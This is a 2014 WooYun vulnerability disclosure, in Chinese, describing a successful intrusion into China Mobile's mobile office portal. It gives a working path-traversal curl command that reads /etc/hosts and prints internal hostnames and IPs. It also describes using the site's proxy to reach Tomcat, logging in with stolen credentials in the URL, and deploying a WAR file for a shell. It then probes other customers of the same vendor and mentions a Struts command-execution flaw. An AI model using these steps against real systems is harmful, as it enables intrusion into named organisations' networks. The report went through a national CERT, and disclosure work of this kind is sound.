当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085441

漏洞标题:中移动某内部核心业务文件读取及延伸(内网边界突破技巧)

相关厂商:中国移动&某系统厂商

漏洞作者: s0mun5

提交时间:2014-12-01 15:23

修复时间:2015-01-15 15:24

公开时间:2015-01-15 15:24

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-05: 厂商已经确认,细节仅向厂商公开
2014-12-15: 细节向核心白帽子及相关领域专家公开
2014-12-25: 细节向普通白帽子公开
2015-01-04: 细节向实习白帽子公开
2015-01-15: 细节向公众公开

简要描述:

中移动某内部核心业务文件读取到奇葩方式getshell
最后延伸到某商业系统

详细说明:

https://moa.10086.cn
中国移动移动办公系统。

Snip20141201_6.png


存在任意文件读取

curl https://moa.10086.cn/../../../../../../../../../etc/hosts -k
127.0.0.1	tailorcmcc1	localhost.localdomain	localhost
::1	tailorcmcc1	localhost6.localdomain6	localhost6
#127.0.1.1	tailorcmcc1
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
10.1.48.57   emis.hq.cmcc
10.1.48.9    cmccbpm1.hq.cmcc
10.1.28.21   oa.hq.cmcc
10.2.7.85    efinance.hq.cmcc
10.1.48.25   cmccbpm3.hq.cmcc
10.1.48.48   iscbpm.hq.cmcc
10.1.48.167  cmccapp4.hq.cmcc
10.1.48.165  hqtydb.hq.cmcc hqtyyb.hq.cmcc
10.1.48.151  hqmail.hq.cmcc
10.1.48.170  cmccapp5.hq.cmcc
10.1.48.164  cmccsm.hq.cmcc
10.1.52.250  uum.hq.cmcc
10.1.48.166	cmccapp3.hq.cmcc
10.1.48.58	app1.hq.cmcc
10.1.48.34	cmccbpm4.hq.cmcc
10.1.48.24	cmccbpm2.hq.cmcc
10.1.48.15	newsonline.hq.cmcc
10.1.48.23	resource.hq.cmcc
#172.16.20.51 mail.chinamobile.com
172.16.121.101 mail.chinamobile.com


后来发现所有的数据都是通过一个叫tailor的二级目录代理进内网做的,猜测这是一个代理服务。

Snip20141201_7.png

漏洞证明:

然后访问https://moa.10086.cn/tailor/http://localhost:8080
访问tomcat成功,利用文件读取读到tomcat密码

Snip20141201_8.png


由于测试发现这个代理不能带401的验证头,在url中写入 访问后台成功
https://moa.10086.cn/tailor/http://admin:passwords@localhost:8080/manager/html
然后部署war包,getshell。

Snip20141201_12.png


出于好奇研究后发现tailor就是一个代理服务,并且可以转码web——》wap
然后找到了这套系统的厂商http://www.h3w.com.cn/。

Tailor是什么?
       Tailor是北京掌中经纬技术有限公司潜心数年研究开发的移动化中间件产品。该产品技术已向国家产权局申请了相关专利并已受理。
Tailor能干什么?
       Tailor顾名思义是一个裁缝,它可以根据用户要求,对各种Web应用进行裁剪、设计、缝制形成一个新的应用,并且Tailor技术是天然移动化的。
Tailor关键技术:
       1. Web应用的拆分与重装技术通过该项技术,可根据业务需要将各类Web应用在应用层完成应用拆解与重组装,并且无需原应用提供接口。
       2. JavaScript执行过程的动态控制可将Web应用前台主要业务逻辑控制脚本(JavaScript)执行过程进行动态控制,包括中断、切分、再执行等。
       通过此两项关键技术,不但可完成某单一简单或复杂应用移动化,并可进行多应用服务融合,甚至对整个服务流程进行切片、重组、优化。目前该两项技术均已申请相关专利


Snip20141201_13.png

成功案例不少,找一个测试一个问题的通用性。
https://m.scmcc.com.cn/

Snip20141201_14.png


Snip20141201_17.png


这家厂商问题还是不少的 比如
http://www.wosoo.net:8880/CQLXEPM/sysmanage/login.action

Snip20141201_18.png


ewp系统 存在struts命令执行,进入内网拿到客户列表应该能突破一些
比如没找到地址的百度~

修复方案:

版权声明:转载请注明来源 s0mun5@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-05 17:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向中国移动通报。

最新状态:

暂无